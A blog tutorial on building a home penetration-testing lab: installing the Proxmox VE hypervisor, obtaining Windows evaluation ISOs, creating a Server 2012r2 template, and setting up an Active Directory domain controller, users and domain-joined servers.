I'm including my server specs just as a reference point. I've found it really helpful in the past when people have done the same:<br />
<br />
<u>2013 configuration</u><br />
<b>CPU:</b> AMD FX-Series 8-Core (Circa 2013)<br />
<b>SSD: </b>512 GB SSD</div>
<div>
<b>Memory: </b>16GB DDR3<br />
<br />
<div>
<u>2017 configuration</u><br />
<b>CPU:</b> AMD FX-Series 8-Core (Circa 2013)<br />
<b>SSD: </b><span style="color: red;">1TB SSD</span><b> </b><span style="color: red;">(Samsung 850 EVO 1TB 2.5-Inch SATA III Internal)</span></div>
<div>
<b>Memory: </b><span style="color: red;">32GB DDR3</span></div>
<div>
<br /></div>
If you are building on consumer hardware like I did, I suggest just going right to 1TB of SSD and 32GB of RAM. I know it isn't cheap, but with only 500GB SSD and 16GB RAM I ran up against those limits pretty quickly. <br />
<br />
In <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>, I touch on a few other options as well, for instance: Rather than using consumer hardware and an expensive 1Tb SSD, you can buy used enterprise grade stuff on ebay, which often comes with tons of storage and memory. This is what my friend <a href="https://twitter.com/mikehacksthings">@mikehacksthings</a> does, who is also the one who introduced me to ProxmoxVE.<br />
<br />
Of course, there are many ways to do this, so here are more great resources that talk about some of the different hardware options:<br />
<br />
<div>
<a href="https://www.darkoperator.com/blog/2017/1/28/home-lab-design">Home Lab Design</a> by Carlos Perez<br />
<a href="https://www.darkoperator.com/blog/2014/1/10/my-new-home-lab-setup">My new home lab setup</a> by Carlos Perez<br />
<a href="https://adsecurity.org/?p=2653">Building an Effective Active Directory Lab Environment for Testing</a> by Sean Metcalf<br />
<a href="https://room362.com/post/2015/intel-nuc-super-server/">Intel NUC Super Server</a> by Mubix</div>
<div>
<br /></div>
<h2>
Let's talk about network placement </h2>
You can get really fancy and run your lab in a restricted subnet, or you can just keep it simple and run it on the same flat network you use for everything else on your home network. You do not need to separate your lab from your home network. In other words, <b>don't let network architecture stop you from setting up your lab. </b>I've made that mistake before.<br />
<br />
If you have a firewall or a router at home you can absolutely place your hypervisor on its own network and control access between your lab and your home network. This is what I am doing now. I have my home network somewhere on 192.168 and I have my lab on 10.0.0.0/24<br />
<br />
Another note: I suggest that you use bridged mode for all virtual machines. You can do almost everything you want to do with NAT, but that means you won't be able to run tools against your lab unless they are being run from other virtual machines in the lab's private network. <br />
<br />
<br />
<h2>
Installing the hypervisor (Proxmox VE)</h2>
If you have a favorite hypervisor and don't want to try Proxmox VE, you can just skip this section.<br />
<div>
<br /></div>
1) Download the ISO<br />
<ol>
<li>https://www.proxmox.com/en/downloads</li>
<li>I went with Proxmox VE 4.4</li>
<ol>
</ol>
</ol>
2) Transfer ISO to CD/DVD or USB<br />
3) Boot your physical server into the install ISO<br />
4) Select Install <b>Proxmox VE</b><br />
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-cg_C13Rr-C8/WS-HWj6L4fI/AAAAAAAABYc/bQHMgg1cicUsqQI2VSQiuFWX96c7FaiDACEw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="957" height="226" src="https://2.bp.blogspot.com/-cg_C13Rr-C8/WS-HWj6L4fI/AAAAAAAABYc/bQHMgg1cicUsqQI2VSQiuFWX96c7FaiDACEw/s400/1.png" width="400" /></a></div>
<div>
<i><br /></i>5) Select <b>I agree</b><br />
6) Pick <b>harddisk </b>and select <b>Next</b><br />
7) Select Country, Time zone, and Keyboard Layout and select <b>Next</b><br />
8) Select a password and enter your email address (I have not gotten any email from them)<br />
9) Configure management network interface and select Next<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-u1hbfAMIH5o/WS-HXDdwa9I/AAAAAAAABYc/0VYAosgE-6QYcQNnnJUzdBBEsQBzXMkMQCEw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="674" data-original-width="932" height="288" src="https://3.bp.blogspot.com/-u1hbfAMIH5o/WS-HXDdwa9I/AAAAAAAABYc/0VYAosgE-6QYcQNnnJUzdBBEsQBzXMkMQCEw/s400/2.png" width="400" /></a></div>
<div>
<br />
10) Select <b>Next</b>. This will begin the install<br />
11) Click <b>Reboot</b><br />
12) At the console, you should see something like this:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ZEL65czQpGc/WS-HXIED4SI/AAAAAAAABYc/5cXgVGLTDUgtKfzp-4PizxIDgrWs6VBmgCEw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="172" data-original-width="636" height="107" src="https://4.bp.blogspot.com/-ZEL65czQpGc/WS-HXIED4SI/AAAAAAAABYc/5cXgVGLTDUgtKfzp-4PizxIDgrWs6VBmgCEw/s400/4.png" width="400" /></a></div>
<div>
<br />
13) Log into the console and update the OS:<br />
<ol>
<li>apt-get update && apt-get -y upgrade</li>
<ol>
</ol>
</ol>
14) You are ready to log in and start building virtual machines<br />
15) Navigate to the IP you gave your PVE (https://IP:8006)<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2WuyBE3-L6A/WS-HXYgWsII/AAAAAAAABYc/rVOSSQwl68gTvSsHjEJd015eYxasOinLwCEw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="28" data-original-width="240" height="46" src="https://1.bp.blogspot.com/-2WuyBE3-L6A/WS-HXYgWsII/AAAAAAAABYc/rVOSSQwl68gTvSsHjEJd015eYxasOinLwCEw/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
16) Log in to web interface with username: root (and the password you specified at install)<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-eWk4Uwjzdlg/WS-HXd2-YYI/AAAAAAAABYc/gxERYbzIWfQ7p0T18-q2MNDoxRbsVZj2gCEw/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="402" height="200" src="https://3.bp.blogspot.com/-eWk4Uwjzdlg/WS-HXd2-YYI/AAAAAAAABYc/gxERYbzIWfQ7p0T18-q2MNDoxRbsVZj2gCEw/s400/6.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
17) SSH to the server - just to make sure you can<br />
<ol>
</ol>
<div>
Troubleshooting tip: I was initially unable to reach my newly installed proxmox. It turns out that the default bridge was set up for eth0, but I was cabled into eth1. My eth1 is a better NIC, so rather than change the cable, I modified /etc/network/interfaces and switched the bridge from eth0 to eth1:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-GXVbFv5tYuo/WS-HW_morYI/AAAAAAAABYA/bcCW2Q6k9hEN3-zGG0snDv8TfhnTC_AQgCLcB/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="371" data-original-width="415" height="357" src="https://2.bp.blogspot.com/-GXVbFv5tYuo/WS-HW_morYI/AAAAAAAABYA/bcCW2Q6k9hEN3-zGG0snDv8TfhnTC_AQgCLcB/s400/13.png" width="400" /></a></div>
<div>
<br /></div>
<h2>
Getting Windows server software</h2>
<div>
If you are going to build on premises, you will need to get your hands on the following software:</div>
<div>
<ul>
<li>Required - Windows Server (2012 or 2016)</li>
<li>Optional - Windows 7 (or 8 or 10) </li>
</ul>
</div>
<div>
In terms of getting the software, there are a few options: </div>
<div>
<ol>
<li>Download evaluation versions, which are good for 180 days</li>
<li>See if your workplace has a key/iso that can be used in a lab environment</li>
<li>I think if you are a student you can get the OS's for free</li>
</ol>
</div>
For this post, I'll walk through the proccess of obtaining an Evaluation License. If you already have licensed copies of windows you can skip the next section:<br />
<h3>
</h3>
<h3>
Obtaining an evaluation license for Windows server</h3>
<div>
For my last AWS walk though, I built the AD lab on Windows Server 2016. For this post, to change it up, I'm going to use Windows Server 2012r2. If you want to use Server 2016, almost all of the steps should be the same. </div>
<div>
<br /></div>
1) Go here: https://www.microsoft.com/en-us/evalcenter/<br />
2) Click the <b>Evaluations</b> square<br />
3) Sign in with your Microsoft account. An old Hotmail account and/or a current outlook.com account should work<br />
4) Click the <b>Evaluations</b> square again</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-y-FTVvdfht8/WS-HXQV96iI/AAAAAAAABYc/_7PUXUEu9Wc2BShmuIvb8M7DmNkmQnwCACEw/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="394" data-original-width="737" height="213" src="https://4.bp.blogspot.com/-y-FTVvdfht8/WS-HXQV96iI/AAAAAAAABYc/_7PUXUEu9Wc2BShmuIvb8M7DmNkmQnwCACEw/s400/9.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
5) Select the product you would like to evaluate (<b>Windows Server 2012r2</b>)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-odHNOqYjX4c/WS-HWkAxg6I/AAAAAAAABYc/oSmhbryY4AEZe_GsQLsLltETcVs1tkGSgCEw/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="422" data-original-width="1129" height="148" src="https://1.bp.blogspot.com/-odHNOqYjX4c/WS-HWkAxg6I/AAAAAAAABYc/oSmhbryY4AEZe_GsQLsLltETcVs1tkGSgCEw/s400/10.png" width="400" /></a></div>
<div>
6) Select <b>Register to continue</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jTHlJm97hBY/WS-HWg2IRvI/AAAAAAAABYc/qt-snxwVtpsQAGW29bGLVET6OrZwxQWowCEw/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="1112" height="63" src="https://1.bp.blogspot.com/-jTHlJm97hBY/WS-HWg2IRvI/AAAAAAAABYc/qt-snxwVtpsQAGW29bGLVET6OrZwxQWowCEw/s320/11.png" width="320" /></a></div>
<div>
<i>7) </i>Enter your info</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ymqRhce1t1Q/WS-HW6b6riI/AAAAAAAABYc/hSZBIxX2Jysdebz4ajUXmedglmprW0D9gCEw/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="545" data-original-width="752" height="288" src="https://1.bp.blogspot.com/-ymqRhce1t1Q/WS-HW6b6riI/AAAAAAAABYc/hSZBIxX2Jysdebz4ajUXmedglmprW0D9gCEw/s400/12.png" width="400" /></a></div>
<div>
8) Select <b>ISO</b></div>
<div>
9) Select <b>64 bit</b> and your language<br />
10) Select <b>Download</b></div>
<div>
<ol>
</ol>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3>
Downloading Windows 10 ISO</h3>
I'll walk through downloading the windows 10 ISO, but as I mentioned earlier, you can skip windows 10 and use Windows7/8 instead.<br />
<br />
1) Click this link: https://www.microsoft.com/en-us/software-download/windows10<br />
2) Click <b>Download tool now</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Zc1qMFKeo4U/WS-XPGB1dpI/AAAAAAAABZI/TLScm-z8Y30Jd-m24UbFKVcgDko0Htp1QCLcB/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="211" data-original-width="348" height="242" src="https://1.bp.blogspot.com/-Zc1qMFKeo4U/WS-XPGB1dpI/AAAAAAAABZI/TLScm-z8Y30Jd-m24UbFKVcgDko0Htp1QCLcB/s400/14.png" width="400" /></a></div>
<i><br /></i>
3) Run the tool<br />
4) Click <b>Accept</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-J7rUSSDu5Xo/WS-XPEJwfTI/AAAAAAAABZM/XCtxTDO5Z2gfLjnZfg0bdtBMtHiyddRiwCEw/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="640" height="288" src="https://2.bp.blogspot.com/-J7rUSSDu5Xo/WS-XPEJwfTI/AAAAAAAABZM/XCtxTDO5Z2gfLjnZfg0bdtBMtHiyddRiwCEw/s400/15.png" width="400" /></a></div>
<i><br /></i>
5) Click <b>Create installation media</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-cd-LhBq23yg/WS-XPNyU1-I/AAAAAAAABZQ/_xl3x3gPV8QKQ7ApWuTG9IKaF1bGdDO3gCEw/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="543" height="113" src="https://3.bp.blogspot.com/-cd-LhBq23yg/WS-XPNyU1-I/AAAAAAAABZQ/_xl3x3gPV8QKQ7ApWuTG9IKaF1bGdDO3gCEw/s400/16.png" width="400" /></a></div>
<i><br /></i>
6) Click <b>Next</b><br />
7) Stick with defaults and click <b>Next</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-emWIfzeGJR8/WS-XPZD7fHI/AAAAAAAABZU/b4_dfpK1wAopCALVLeADM8b90-VqcwBkwCEw/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="579" height="198" src="https://4.bp.blogspot.com/-emWIfzeGJR8/WS-XPZD7fHI/AAAAAAAABZU/b4_dfpK1wAopCALVLeADM8b90-VqcwBkwCEw/s400/17.png" width="400" /></a></div>
<br />
8) Click <b>ISO file</b><br />
9) Save the ISO (The default filename is windows.iso. I suggest renaming it to Win10Eval.iso or something)<br />
<br />
<h2>
Transfering ISOs to Proxmox</h2>
You can either configure a network share for proxmox, or just drop ISO's in the right directory. The easiest way to do it is to SCP your ISO's to /var/lib/vz/template/iso/<br />
<br />
<h2>
VM #1: Creating our Server 2012r2 Template</h2>
<div>
For our first VM, let's go with Windows Server 2012r2. We will configure the VM, install the OS, convert our VM to a template, and then use that template to deploy two VMs for our lab. </div>
<h3>
</h3>
<h3>
Configuring a Promox VM (Windows Server 2012r2)</h3>
1) Log into the proxmox web interface<br />
2) At the top right, click <b>Create VM</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-4A23EWNZsFg/WS-XPR_OakI/AAAAAAAABZY/YUZVufOKIlM8z1vidmCHUXSPL8wwbjMXwCEw/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="112" data-original-width="546" height="65" src="https://3.bp.blogspot.com/-4A23EWNZsFg/WS-XPR_OakI/AAAAAAAABZY/YUZVufOKIlM8z1vidmCHUXSPL8wwbjMXwCEw/s320/18.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
3) General: Enter ID and Name and click next<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-FdgWGnhzwh4/WS-XPf2_olI/AAAAAAAABZc/9oLjxU78ss4CF3xay5iC7l9Z4FgISnXbACEw/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="174" data-original-width="317" src="https://2.bp.blogspot.com/-FdgWGnhzwh4/WS-XPf2_olI/AAAAAAAABZc/9oLjxU78ss4CF3xay5iC7l9Z4FgISnXbACEw/s1600/19.png" /></a></div>
<br />
4) OS: Select your OS (<b>Microsoft Windows 8.x/Server 2012r2</b>) and click <i>next </i><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-dtJOOHw-DmQ/WS-hWQeFdwI/AAAAAAAABa8/ejPrtFFbxFUwFFBJOYFiV0_MSxqbM8NEACLcB/s1600/23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="149" data-original-width="255" src="https://4.bp.blogspot.com/-dtJOOHw-DmQ/WS-hWQeFdwI/AAAAAAAABa8/ejPrtFFbxFUwFFBJOYFiV0_MSxqbM8NEACLcB/s1600/23.png" /></a></div>
<i><br /></i>
5) Storage: Select <b>local</b>, and then your transferred ISOs should show up in that list. Select the correct windows server 2012 ISO and click <i>next</i><br />
<i><br /></i>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-scIBre-opos/WS-XPpyT_TI/AAAAAAAABZg/mtbKuFzHh0wxZeH4PMOJ1ysH-E8WFDzQACEw/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="515" height="149" src="https://2.bp.blogspot.com/-scIBre-opos/WS-XPpyT_TI/AAAAAAAABZg/mtbKuFzHh0wxZeH4PMOJ1ysH-E8WFDzQACEw/s320/20.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<i><br /></i>
6) Hard Disk: Click <b>next</b><br />
7) CPU: Click <b>next</b><br />
8) Memory: I liked to select <b>Automatically allocate memory within this range</b>, and for Windows I tell it to stay between 1 and 4GB. You can certainly tweak these based on how much RAM you have. 9) Click <b>next</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CqT3W3yM4Jo/WS-XPprlpsI/AAAAAAAABZk/70vAyF4mOYEf7uqtBMEbkJdKNyk4s9fbwCEw/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="422" height="247" src="https://4.bp.blogspot.com/-CqT3W3yM4Jo/WS-XPprlpsI/AAAAAAAABZk/70vAyF4mOYEf7uqtBMEbkJdKNyk4s9fbwCEw/s320/21.png" width="320" /></a></div>
<br />
10) Network: Keep defaults (Bridged mode), and click <b>next</b><br />
11) Click <b>finish</b><br />
12) In the right side column, find and right click the newly created instance. Click <b>start</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-FPrRQd9Enaw/WS-XPurjxwI/AAAAAAAABZs/KJgF-LNOF9YCMCJXfGrlVi1ZomPui-94gCEw/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="74" data-original-width="293" src="https://3.bp.blogspot.com/-FPrRQd9Enaw/WS-XPurjxwI/AAAAAAAABZs/KJgF-LNOF9YCMCJXfGrlVi1ZomPui-94gCEw/s1600/22.png" /></a></div>
<br />
13) One column over, click <b>Console</b><br />
<br />
At this point, we are just installing Windows Server 2012r2 as we would normally. I'm going to keep it simple with some bulleted instructions and some commentary, but if you are looking for a similar post that has some nice looking pictures to go with these steps, check out the following series (Parts 1-3): <a href="https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-1/">https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-1/</a><br />
<div>
<br />
<b>Time/Sanity Saving Tip</b>: I used to spend hours updating all of my virtual machines before I would make a snapshot or template, but eventually I realized that it was mostly a waste of time. Sure, there are a few times where you do want to test your tools against a fully patched box. But, if this is your first pentest lab, I suggest learning from my hours of wasted time and skipping the patches until you need them. This applies to both the servers and the desktops. </div>
<h3>
Installing Windows Server 2012r2</h3>
<div>
1) If using local virtualization (not cloud based), give it 24-32GB of HD space and 1-2GB of RAM. 2) Attach the ISO, boot up the virtual machine, and use this as a guide:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
3) Accept Default settings and click <b>Next</b><br />
4) Click <b>Install Now</b><br />
5) Select <b>Windows Server 2012 R2 Standard (server with a GUI)</b><br />
6)Accept the license terms and click <b>Next</b><br />
7) Select <b>Custom - New Installation</b><br />
8) Highlight <b>Drive0 unallocated space</b><br />
9) Click <i>Next</i><br />
10) Create an admin password. <i>Use something you don't mind other people seeing, as you might share stuff from this lab one day ;)</i><br />
11) Use the proxmox shortcut icon to enter Ctrl+Alt+Delete, and log in:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-E-8_3qF8S9M/WS-Yg01oWWI/AAAAAAAABaM/WlJYocjzICQwEhtLAJYhfFERwzNzq9xZACEw/s1600/24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="854" height="75" src="https://2.bp.blogspot.com/-E-8_3qF8S9M/WS-Yg01oWWI/AAAAAAAABaM/WlJYocjzICQwEhtLAJYhfFERwzNzq9xZACEw/s320/24.png" width="320" /></a></div>
<div>
<br /></div>
<div>
<ul>
</ul>
12) On the right hand popup: Do you want to to find PCs, devices, etc. on the network: <i>Yes</i><br />
13) Do anything else you need to do on this VM before you convert it to a template. For instance, if you are not using a Eval license, you will want to run sysprep on the VM before you turn it into a template.<br />
<h2>
</h2>
<h3>
</h3>
<h3>
Converting a VM to a template in Proxmox</h3>
</div>
<div>
1) Shut down and power off your VM</div>
<div>
2) On the left hand bar, right click on your Windows2012r2 VM and select <b>Convert to template</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-zOzJRPtcrQE/WS-hWeqo1kI/AAAAAAAABa0/6hH5HLMNLOknnEv6eaRZNxvfP_PfcPM9wCEw/s1600/25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="304" src="https://2.bp.blogspot.com/-zOzJRPtcrQE/WS-hWeqo1kI/AAAAAAAABa0/6hH5HLMNLOknnEv6eaRZNxvfP_PfcPM9wCEw/s1600/25.png" /></a></div>
<div>
<i><br /></i></div>
<div>
3) Click <i>Yes</i> at the confirmation page. Note: It will take a few minutes for the template to show up. You might see it more quickly if you refresh the proxmox page. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-kdkzkMnvet4/WS-hWoJokbI/AAAAAAAABbA/noAajHrl9IQxoclafUJc6NZFdRTFenvqACEw/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="158" data-original-width="281" src="https://2.bp.blogspot.com/-kdkzkMnvet4/WS-hWoJokbI/AAAAAAAABbA/noAajHrl9IQxoclafUJc6NZFdRTFenvqACEw/s1600/26.png" /></a></div>
<div>
<br /></div>
<div>
4) That's it. You are ready to launch VMs from the template by right clicking on the template and selecting <b>clone</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-SU5M04xyo8c/WS-hWkLynoI/AAAAAAAABbE/3-NBk7UaCpwYHsPNcj4rxqdVsenZVVKAwCEw/s1600/27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="97" data-original-width="148" src="https://2.bp.blogspot.com/-SU5M04xyo8c/WS-hWkLynoI/AAAAAAAABbE/3-NBk7UaCpwYHsPNcj4rxqdVsenZVVKAwCEw/s1600/27.png" /></a></div>
<div>
<i><br /></i></div>
<div>
</div>
<h2>
VM #2 - Creating your 2012r2 Domain Controller</h2>
<h3>
Creating a new VM by cloning your template</h3>
<div>
<br /></div>
<div>
1) On the first tab of the Clone wizard, you will be asked if you would like to create a linked clone or a full clone. Linked clones are great, but that means you can never get rid of your template, so just be mindful of that. I don't like using linked clones when cloning one live VM into another, because it is hard to keep track. But with templates, I use them, because it is easier for me to make sure I never touch my templates. This is another reason why a 1TB drive is really nice.<br />
2) Right click on your template and select <b>Clone</b></div>
<div>
3) Name the first clone in the wizard (This will be your DC), and click <b>clone</b><br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-4hFhVmtY11I/WS-hWmdKjzI/AAAAAAAABbI/gRNEKM0UHUU75nmId7kbxdfGpwuY4SPTACEw/s1600/28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="602" height="165" src="https://2.bp.blogspot.com/-4hFhVmtY11I/WS-hWmdKjzI/AAAAAAAABbI/gRNEKM0UHUU75nmId7kbxdfGpwuY4SPTACEw/s400/28.png" width="400" /></a></div>
<div>
<br /></div>
<div>
4) Start DC01</div>
<div>
5) Assign a static IP. This is especially important for your DC. It doesn't matter if you chose NAT or bridged mode, but in either case, you will want a static IP in that range for your DC. </div>
<div>
<ul>
<li>Right click on network icon on bottom right and click <b>Network and Sharing</b></li>
<li>Click <b>Ethernet</b> </li>
<li><b>Properties </b></li>
<li><b>IPv4</b> </li>
<li><b>Properties</b></li>
<ul>
</ul>
</ul>
6) This is not required, but this is a good time to change your hostname as well:<br />
<ul>
<li>Click the folder on the launch bar</li>
<li>Right click <b>This PC</b> on the left side</li>
<li><b>Properties, Change settings</b></li>
<li><b>Change</b></li>
<li>Change the computer name</li>
<li>Reboot</li>
<ul>
</ul>
</ul>
<h3>
Promoting your first server to a DC</h3>
1) Take a snapshot just in case you mess up :). Trust me, do it!<br />
<ul>
<li>To take a snapshot in Proxmox, Select your VM, switch from <b>Console</b> to <b>Snapshot</b> on the second left most bar, and click <b>Take Snapshot. </b></li>
<ul>
</ul>
</ul>
2) In the Server Manager, at the top right click <b><i>manage, add roles and features</i></b><br />
3) <b>Next, Next, Next</b><br />
4) Select <b>Active Directory Domain Services</b><br />
5) Select <b>Add Features</b><br />
6) Select <b>DNS Server</b><br />
7) Select <b>Add Features</b><br />
8) <b>Next, Next, Next, Next</b><br />
9) Select <b>Restart the destination server automatically if required</b><br />
10) <b>Yes, Install, Close</b><br />
11) In server manager, you will see a yellow caution triangle. Click it,<br />
12) Click <b>promote this server to a domain controller</b><br />
13) Add new forest<br />
14) Name your domain: <i> you can do lab.local for now, or you can make room for more domains in the future with something like lab.proxmox.local.</i><br />
15) Click <b>Next</b><br />
16) Create and record the DSRM password<br />
17) Click <b>Next</b> (ignore warning), <b>Next, Next, Next, Install</b><br />
18) You will see: <b>You are about to be signed out.</b><br />
19) Click <i>close</i> (or just hang tight)<br />
<br />
<ul>
</ul>
<h3>
You now have an Active Directory Domain - Add some users</h3>
<div>
I'm going to walk you through adding a bunch of users, and how to make one of those users a domain administrator. I am not going to cover setting up OU's in this post. If you are interested doing that now, take a look at this awesome post from Jared Haight: <a href="https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-3/">Setting up an Active Directory Lab - Part 3</a></div>
<div>
<ul>
<li>Within server manager, which should have just popped up, click tools at the top right and select active directory users and computers</li>
<li>Double click on your domain to expand it</li>
<li>Right click on users and add new user</li>
<li>Name your users however you want, but I like to keep it simple: </li>
<ul>
<li>First: <b>User</b></li>
<li>Last: <b>1</b></li>
<li>Login name: <b>user1</b></li>
<li>Next</li>
<li>Enter an easy to remember/crack password</li>
<li>Uncheck <b>user must change at next login</b></li>
<li>Check <b>password never expires</b></li>
<li>Next</li>
<li>Finish</li>
</ul>
<li>Repeat for user2</li>
<li>Then I suggest adding some user accounts that you will use as admins. You can go with <i>user1-admin</i>, or even just a simple <i>admin1, admin2</i></li>
</ul>
<h3>
</h3>
<h3>
Add at least one admin user to your domain admins group</h3>
</div>
<div>
<ul>
<li>Within <b>Active Directory Users and Computers</b>, Double click <b>Domain Admins</b></li>
<li>Click <b>Members</b></li>
<li>Click <b>Add</b></li>
<li>Start typing a username of your admin user and click <b>check names</b></li>
<li>Click <b>OK</b></li>
<li>Click <b>OK</b></li>
</ul>
<h3>
</h3>
<h2>
</h2>
<h2>
VM #3: Creating your second 2012r2 server</h2>
This VM is optional, but the beauty of using a hypervisor on dedicated hardware is that you most likely have memory and storage space to spare. <br />
<br />
<div>
1) Repeat steps 1 and 2 on VM2, but this time name it something like SRV01:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-zhsqiCAoRWQ/WS-hWsJmrRI/AAAAAAAABbM/Fdr0_cidDooEli_CZFLKZtQS_Mbjz-J2ACEw/s1600/29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="247" data-original-width="596" height="165" src="https://3.bp.blogspot.com/-zhsqiCAoRWQ/WS-hWsJmrRI/AAAAAAAABbM/Fdr0_cidDooEli_CZFLKZtQS_Mbjz-J2ACEw/s400/29.png" width="400" /></a></div>
<br />
2) Start the server and add it to the domain<br />
<br />
<h3>
Configuring DNS</h3>
To add any machine to the domain, the one thing you NEED to do is set the domain controller as the primary DNS server. <br />
<br />
1) RDP to server<br />
2) Right click on the networking icon at the bottom left and click Open Network and Sharing Center<br />
3) Select Ethernet Adapter<br />
4) Change the primary DNS server to be the IP address of your DC<br />
<br />
<h3>
Adding host to the domain</h3>
While this process is fairly straightforward, I feel like it never works the first time for me. If you run into issues, read the notes right after these steps for ideas.<br />
<br />
1) Select the folder icon in the task bar<br />
2) Right click This PC<br />
3) Click Properties<br />
4) Under Computer name, domain, and workgroup settings, click Change settings<br />
5) Click Change<br />
6) Give your machine a better hostname: Workstation01 <br />
7) Switch from Workgroup to Domain and specify the domain. For example, aws.local<br />
8) Click OK<br />
9) Enter Domain Admin credentials. Go ahead and use Admin1's credentials.<br />
10) Once your machine has been added, click OK twice<br />
11) Close the window, and go ahead and Restart Now<br />
12) Repeat this for all servers<br />
<br />
Having trouble adding your host to the domain? Here are some troubleshooting tips:<br />
<br />
1) Can you ping the IP address of your DC from your other server(s)?<br />
2) Can you resolve the hostname of your DC from your other server(s)?<br />
